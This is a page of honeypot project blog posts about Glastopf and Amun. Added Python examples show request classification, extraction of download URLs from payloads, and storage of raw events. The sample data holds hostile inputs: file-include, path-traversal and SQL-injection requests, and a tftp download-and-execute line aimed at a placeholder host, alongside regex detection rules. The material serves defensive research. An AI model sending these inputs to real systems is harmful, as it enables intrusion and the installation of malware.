Glastopf in the coming months

Filed under Glastopf, Honeypot on 27 January 2010
Other Languages: German

Today I will say a bit about Glastopf and what is coming up in the next months.

Glastopf:
Last Friday (22 January) I met Sven. Sven is a bachelor student at the Bern University of Applied Sciences and will write his thesis on Glastopf. He will do a complete rewrite, but when he is finished the new version will have at least the same features as the old one. These are the goals: a much better modular structure, meaning a single core that dispatches every request to the modules; the modules store the data, emulate the vulnerability and compose the response that the core sends back to the attacker. Classification of incoming attacks will be much better, and the rules used for it will be kept completely separate from the source code so they can be distributed easily between sensors. I will post details as soon as we have started the work. This also means that we will freeze the current unstable version and put all effort into the new one.
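To make the planned design concrete, here is an added example of the core-and-modules split with an external rule set; it is illustration code written for this page, not Glastopf's own code, and the rule file format, the module names, the emulated replies and the four sample requests are all assumptions or constructed for the demo. The core only knows how to classify a request against rules loaded from JSON text and hand it to the module named by the matching rule; each module stores the event in a shared store and composes the reply.

```python
import json
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed rule set in the form a sensor would load from a file: a name, a
# regex applied to the request URL, and the module that emulates that class.
RULES_JSON = r"""
[
  {"name": "rfi",  "pattern": "=(?:https?|ftp)://[^&\\s]+",             "module": "rfi"},
  {"name": "lfi",  "pattern": "=(?:\\.\\./)+[^&\\s]*",                  "module": "lfi"},
  {"name": "sqli", "pattern": "(?i)(?:union\\s+select|'\\s*or\\s+1=1)", "module": "sqli"}
]
"""

@dataclass
class Request:
    remote: str
    url: str

@dataclass
class Event:
    remote: str
    url: str
    rule: str
    detail: dict = field(default_factory=dict)

def query_values(url):
    return [v for vals in parse_qs(urlsplit(url).query).values() for v in vals]

class Module:
    """Default module: records the event and answers 404 like a real server."""
    name = "default"
    def __init__(self, store):
        self.store = store  # shared event store; a database in a real sensor
    def handle(self, req, rule):
        event = self.extract(req, rule)
        self.store.append(event)
        return self.respond(event)
    def extract(self, req, rule):
        return Event(req.remote, req.url, rule)
    def respond(self, event):
        return 404, "Not Found"

class RFIModule(Module):
    name = "rfi"
    def extract(self, req, rule):
        urls = [v for v in query_values(req.url) if re.match(r"(?:https?|ftp)://", v)]
        return Event(req.remote, req.url, rule, {"include_urls": urls})
    def respond(self, event):
        # Claim success so the bot carries on; the file named in the URL is what
        # a sensor would fetch and hand to the sandbox.
        return 200, "<html><body>%d file(s) included</body></html>" % len(event.detail["include_urls"])

class LFIModule(Module):
    name = "lfi"
    def extract(self, req, rule):
        return Event(req.remote, req.url, rule,
                     {"paths": [v for v in query_values(req.url) if "../" in v]})
    def respond(self, event):
        return 200, "root:x:0:0:root:/root:/bin/bash\n"  # the usual traversal bait

class SQLiModule(Module):
    name = "sqli"
    def respond(self, event):
        return 500, "You have an error in your SQL syntax"

class Core:
    """Classifies every request with the external rules, then hands it to a module."""
    def __init__(self, rules_json, modules, store):
        self.rules = [(r["name"], re.compile(r["pattern"]), r["module"])
                      for r in json.loads(rules_json)]
        self.modules = {m.name: m for m in modules}
        self.default = Module(store)
    def classify(self, req):
        for name, pattern, module in self.rules:  # first matching rule wins
            if pattern.search(req.url):
                return name, module
        return "unknown", None
    def dispatch(self, req):
        rule, module_name = self.classify(req)
        return self.modules.get(module_name, self.default).handle(req, rule)

def run_demo():
    """Dispatch four constructed requests; returns (event store, replies)."""
    store = []
    core = Core(RULES_JSON, [RFIModule(store), LFIModule(store), SQLiModule(store)], store)
    requests = [
        Request("203.0.113.10", "/index.php?page=http://203.0.113.5/shell.txt"),
        Request("203.0.113.11", "/index.php?file=../../../../etc/passwd"),
        Request("203.0.113.12", "/item.php?id=1' or 1=1--"),
        Request("203.0.113.13", "/robots.txt"),
    ]
    return store, [core.dispatch(r) for r in requests]
```

Because the rules live in data rather than code, a new attack class can be pushed to every sensor as a rule file, and only a genuinely new emulation needs a module. Two caveats for anyone extending this: rules are evaluated in order and the first match wins, so put the most specific ones first, and real requests arrive percent-encoded, so a sensor should decode the URL before matching (left out here to keep the demo short).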

PHP Sandbox:
I'm working on connecting Glastopf to a PHP sandbox in order to classify the collected samples. This also makes it possible to answer common requests to a Glastopf sensor with the same, perfectly emulated reply produced by the sandbox. The collected bots have great potential for research on web server botnets. More posts on this topic will follow.

Project:
We are also looking forward to intensifying our cooperation with interested universities and companies, especially 1and1 and the Bern University of Applied Sciences. We are also officially integrating some people into the project who are already working on different parts of it.

Meeting:
At the end of March we are planning a meeting in Karlsruhe, Germany, of everyone interested in the project. The goal is to push the discussions further, exchange knowledge, get to know each other and of course drink some beer :) . There will also be some short talks on how we continue with the project, and some of us will talk about how they use Glastopf. More information, and in the near future the schedule, can be found in our wiki: GlasCon-3-2010

Glastopf Mailing List

Filed under Glastopf, Honeypot on 27 January 2010
Other Languages: German

To move Glastopf support out of the IRC data nirvana, we got a mailing list from the Honeynet Project. You can subscribe via the web interface (Mailman) and browse the so far glorious archive right here (Pipermail). I'm looking forward to some good discussions ;)

Amun – Technical Report

Filed under Amun, Honeypot on 20 January 2010
Other Languages: None

Jan Göbel has written a detailed report on his low-interaction honeypot Amun. The paper explains in depth how Amun works and was written in the hope of giving enough insight to encourage contributions of vulnerability modules.

English summary:

In this report we describe a low-interaction honeypot, which is capable of capturing autonomous spreading malware from the internet, named Amun. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities, the payload transmitted by the attacker is analyzed and any download URL found is extracted. Next, the honeypot tries to download the malicious software and store it on the local hard disk for further analysis. As a result, we are able to collect at best unknown binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.

The paper is available as a PDF in the electronic library of the University of Mannheim.
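The step the summary describes, analysing the payload and pulling out every download location before fetching the sample, is easy to misjudge in size: bots rarely send a clean URL, they send a shell one-liner or shellcode with the URL obscured. The following is an added example written for this page, not Amun's code (Amun's shellcode analysis is considerably more complete); the two payloads are constructed, the addresses are from the documentation range, and the single-byte XOR key is made up. It recognises clear-text http/ftp URLs and the Windows `tftp -i <ip> get <file>` idiom, and falls back to brute-forcing single-byte XOR decoders when nothing is found in clear text. The download itself is left out so the example runs offline.

```python
import re

# Clear-text download URLs (http/ftp) and the Windows tftp download idiom.
URL_RE = re.compile(rb"(?:https?|ftp)://[A-Za-z0-9._~:/?#@!$&'()*+,;=%-]+")
TFTP_RE = re.compile(rb"tftp(?:\.exe)?\s+-i\s+(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(\S+)", re.I)

def extract_plain(payload: bytes) -> list:
    """Return every download location found in clear text, as strings."""
    urls = [m.group(0).decode("ascii") for m in URL_RE.finditer(payload)]
    for m in TFTP_RE.finditer(payload):
        urls.append("tftp://%s/%s" % (m.group(1).decode("ascii"),
                                      m.group(2).decode("ascii", "replace")))
    return urls

def xor_decode(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def extract_xor(payload: bytes) -> list:
    """Try every single-byte XOR key; keep the keys that reveal a download URL."""
    hits = []
    for key in range(1, 256):
        urls = extract_plain(xor_decode(payload, key))
        if urls:
            hits.append((key, urls))
    return hits

def extract_download_urls(payload: bytes) -> dict:
    """Clear text wins; otherwise the first XOR key that exposes a URL."""
    urls = extract_plain(payload)
    if urls:
        return {"encoding": "plain", "urls": urls}
    hits = extract_xor(payload)
    if hits:
        key, urls = hits[0]
        return {"encoding": "xor:0x%02x" % key, "urls": urls}
    return {"encoding": None, "urls": []}

# Constructed payloads: a NOP sled followed by a tftp download command, and an
# http URL hidden behind a single-byte XOR with the made-up key 0x5a.
PLAIN_PAYLOAD = b"\x90" * 8 + b"cmd /c tftp -i 203.0.113.7 get bot.exe && bot.exe"
XORED_PAYLOAD = b"\x90" * 8 + xor_decode(b"GET http://203.0.113.9/update.exe then run it", 0x5A)

if __name__ == "__main__":
    for payload in (PLAIN_PAYLOAD, XORED_PAYLOAD, b"\x90" * 16):
        print(extract_download_urls(payload))
```

The brute force is cheap (255 decodes of a few hundred bytes) and a false positive is practically impossible because a wrong key cannot produce the literal `http://` or `tftp -i` sequence; what this simple scan does not cover is shellcode that assembles the URL in registers or uses a multi-byte key, which is where a real analyser has to emulate the decoder instead of guessing it.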

Honeynet Project First Forensic Challenge 2010

Filed under Security on 20 January 2010
Other Languages: None

The Honeynet Project has published its first Forensic Challenge for 2010. This challenge, created by Tillmann Werner, is about analysing a pcap attack trace. Full details and the trace are available on the project page.

Glastopf Webinterface RC1

Filed under Glastopf, Honeypot on 8 January 2010
Other Languages: German

For a few days now the first release candidate of the Glastopf web interface, version 0.0.1, has been available. Information on how to set it up, and the required files, can be found in our repository. The new web interface lets you visualise the data collected with Glastopf and draw first conclusions from it.

Glastopf Webinterface

Filed under Glastopf, Honeypot on 20 December 2009
Other Languages: German

Those who are using Glastopf have certainly thought about how to evaluate and make further use of the collected data. First there is the SURFids plug-in, which lets you use the SURFids web interface as an analysis front end. If you prefer the easy way, send your data to the central database and use its web interface. Last but not least there is a web interface developed by people from the Glastopf project, but it has been a bit neglected in the last months. Marcel Koßin noticed this and put a lot of effort into a rework. As soon as the first version is finished and the repository works properly we will release more details and the source.

Happy Birthday Glastopf

Filed under Glastopf, Honeypot, Web Honeypot on 12 December 2009
Other Languages: German

Glastopf has now been publicly available for one year. A lot has changed during this year: Glastopf has been developed in many respects, and I have found many people (or they found me) who are very interested in the project and are now working together with me. The coming year will bring a lot of changes, among them improved attack classification, integration of a PHP sandbox, refinement of the vulnerability emulator and development of the web interface. If nothing goes wrong I will also be able to write more documentation.

Know Your Tools: use Picviz to find attacks

Filed under General on 28 November 2009
Other Languages: German

The Honeynet Project has announced the publication of the first paper in the new Know Your Tools series: "KYT: use Picviz to find attacks", authored by Sebastien Tricaud from the French Chapter and Victor Amaducci from the University of Campinas.

The paper can be downloaded at Know Your Tools: use Picviz to find attacks.

Honeynet Chicago Chapter

Filed under Honeypot on 28 November 2009
Other Languages: German

Since the Google Summer of Code 2009 I have been working with the Honeynet Project, and in retrospect I have benefited a lot from it and met excellent people. The Honeynet Project provides direct access to most of the people who are leading honeypot development and research. Since a few days ago I am an official member of the Honeynet Chicago Chapter, which gives me the opportunity to give some of my knowledge back to the project.

rawout plug-in

Filed under Glastopf, Honeypot on 13 November 2009
Other Languages: None

Konrad Rieck rightly pointed out that Glastopf had no way to store an attacker's raw data. He wrote a plug-in that does exactly that.
I adapted it a little and merged it into Glastopf. A file is now created every day containing the complete data of all events recorded on that day.
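For readers who want to see what such a per-day raw store looks like, here is an added example in the spirit of the plug-in; it is not the plug-in's code, and the file layout (one JSON line per event in a file named after the UTC date), the directory and the three sample events are assumptions or constructed for the demo. The one detail worth getting right is that attacker input is arbitrary bytes, so it is decoded as latin-1 before JSON serialisation and re-encoded on the way back, which preserves every byte value exactly.

```python
import json
import os
import tempfile
from datetime import datetime, timezone

class RawOut:
    """One file per UTC day; each line holds one event with its raw request bytes."""
    def __init__(self, directory):
        self.directory = directory
        os.makedirs(directory, exist_ok=True)

    def path_for(self, when):
        return os.path.join(self.directory, when.strftime("%Y-%m-%d") + ".raw")

    def record(self, when, remote, raw_request):
        # latin-1 maps every byte 0-255 to exactly one code point, so binary
        # attacker data survives the JSON round trip unchanged.
        entry = {"ts": when.isoformat(), "remote": remote,
                 "raw": raw_request.decode("latin-1")}
        with open(self.path_for(when), "a", encoding="utf-8") as fh:
            fh.write(json.dumps(entry) + "\n")

    def read_day(self, when):
        """Return that day's events with 'raw' restored to bytes."""
        path = self.path_for(when)
        if not os.path.exists(path):
            return []
        with open(path, encoding="utf-8") as fh:
            entries = [json.loads(line) for line in fh if line.strip()]
        for entry in entries:
            entry["raw"] = entry["raw"].encode("latin-1")
        return entries

def demo():
    """Record three constructed events around midnight UTC and read them back."""
    day1 = datetime(2009, 11, 13, 23, 59, 30, tzinfo=timezone.utc)
    day2 = datetime(2009, 11, 14, 0, 0, 10, tzinfo=timezone.utc)
    with tempfile.TemporaryDirectory() as directory:
        out = RawOut(directory)
        out.record(day1, "203.0.113.20",
                   b"GET /index.php?page=http://203.0.113.5/x.txt HTTP/1.0\r\n\r\n")
        out.record(day1, "203.0.113.21",
                   b"POST /a.php HTTP/1.0\r\n\r\n\x00\xff\x90binary")
        out.record(day2, "203.0.113.22", b"GET /robots.txt HTTP/1.0\r\n\r\n")
        return {"day1": out.read_day(day1), "day2": out.read_day(day2)}

if __name__ == "__main__":
    for day, events in demo().items():
        print(day, len(events), [e["raw"][:20] for e in events])
```

Appending line by line means a crashed sensor loses at most the event being written, and a day file can be shipped or parsed independently of the others; whether the day boundary should be UTC or local time is a choice to make once and keep, since mixing the two makes correlation between sensors painful.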


Design by Robin Hastings - colour adaptation by Ulysses Ronquillo